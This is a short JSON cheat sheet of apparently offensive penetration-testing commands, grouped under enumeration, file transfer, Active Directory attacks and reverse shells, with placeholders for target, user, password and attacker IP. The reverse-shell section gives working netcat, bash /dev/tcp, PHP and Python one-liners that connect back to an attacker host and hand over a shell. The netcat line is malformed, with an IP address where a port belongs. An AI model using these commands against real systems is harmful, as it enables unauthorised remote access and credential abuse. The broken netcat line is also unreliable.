{
    "Enumeration": [
        "nmap -sC -sV -oA scan {TARGET_IP}",
        "enum4linux -a {TARGET_IP}"
    ],
    "File Transfer": [
        "wget http://{TARGET_IP}/file.txt",
        "scp file.txt {USERNAME}@{TARGET_IP}:/tmp/"
    ],
    "Active Directory Attacks": [
        "crackmapexec smb {TARGET_IP} -u {USERNAME} -p {PASSWORD}",
        "bloodhound-python -c All -u {USERNAME} -p {PASSWORD} -d domain.local -dc-ip {TARGET_IP}"
    ],
    "Reverse Shells": [
        "nc -e /bin/sh {TARGET_IP} {SOURCE_IP}",
        "bash -i >& /dev/tcp/{SOURCE_IP}/4444 0>&1",
        "php -r '$sock=fsockopen(\"{SOURCE_IP}\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
        "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{SOURCE_IP}\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    ]
}
